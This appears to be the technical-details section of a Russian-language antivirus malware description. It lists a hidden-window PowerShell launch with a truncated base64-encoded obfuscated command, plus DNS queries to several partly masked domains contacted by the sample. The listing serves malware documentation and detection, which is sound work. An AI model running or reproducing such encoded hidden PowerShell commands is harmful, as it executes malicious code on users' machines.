Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABQAHIAbwBnAHIAZQBzAHMAaQB2AGUAegBkAGoAPQAnAE8AdQB0AGQAbwBvAHIAcwBfAF8ARwByAG8AYwBlAHIAeQBkAHQAegA...
- DNS ASK fi###haber.net
- DNS ASK al####s-always.us
- DNS ASK hd##m.org
- DNS ASK du####-narakita.com
- DNS ASK th######ctkitandcompany.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABQAHIAbwBnAHIAZQBzAHMAaQB2AGUAegBkAGoAPQAnAE8AdQB0AGQAbwBvAHIAcwBfAF8ARwByAG8AYwBlAHIAeQBkAHQAegA...' (со скрытым окном)